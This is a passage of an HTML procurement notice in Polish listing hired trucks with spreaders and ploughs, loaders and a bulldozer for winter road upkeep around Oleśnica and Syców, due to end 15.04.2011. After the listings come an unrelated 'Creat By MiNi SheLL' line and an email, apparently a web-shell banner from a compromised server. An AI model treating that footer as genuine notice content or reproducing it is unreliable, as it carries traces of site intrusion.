<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część nr 2
- Samochód ciężarowy do piaskarki ŚNIEŻKA z pługiem PDP-A2700,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ładowność: pow. 15 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część nr 3
- Samochód ciężarowy do piaskarki P-1 z pługiem PO-64,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ładowność: pow. 8 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część nr 4
- Samochód ciężarowy wraz z piaskarką.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> o pojemności : od 4,5 do 7 m3 oraz z pługiem, o szerokości odśnieżania od 2,7 do 3,2 m.
które są w dyspozycji Wykonawcy, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część nr 5
- Ładowarka czołowa,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pojemność łyżki: min. 2 m3, szt. 1, która jest w dyspozycji Wykonawcy, wraz z pracą operatora.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 150 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część nr 6
- Ładowarka czołowa,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pojemność łyżki: min. 4,5 m3, szt. 1, która jest w dyspozycji Wykonawcy, wraz z pracą operatora.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 50 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część nr 7
- Spychacz wraz z zestawem niskopodwoziowym,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> całkowity ciężar spychacza 18-20 t, szt. 1, który jest w dyspozycji Wykonawcy, wraz z pracą operatora.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Oleśnicy.
Maksymalna ilość usług (godz.): praca 50 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część nr 8
- Samochód ciężarowy do piaskarki PP-1 z pługiem PO-97SL,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ładowność: pow. 13 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część nr 9
- Samochód ciężarowy do piaskarki PP-1 z pługiem PDP,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ładowność: pow. 13 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część nr 10
- Samochód ciężarowy do piaskarki P-1 z pługiem PO-64,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ładowność: pow. 8 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część nr 11
- Samochód ciężarowy do piaskarki P-1 z pługiem PO-64,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ładowność: pow. 8 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 20 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Część nr 12
- Samochód ciężarowy do pługa PJ10,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ładowność: pow. 14 t, szt. 1, jako nośnik pod ww. sprzęt stanowiący własność Zamawiającego, wraz z pracą kierowcy.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 100 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Część nr 13
- Ładowarka czołowa,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pojemność łyżki: min. 2 m3, szt. 1, która jest  w dyspozycji Wykonawcy, wraz z pracą operatora.
Dotyczy: sieć dróg administrowanych przez Obwód Drogowy w Sycowie.
Maksymalna ilość usług (godz.): praca 210 godz., dyżur 150 godz..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com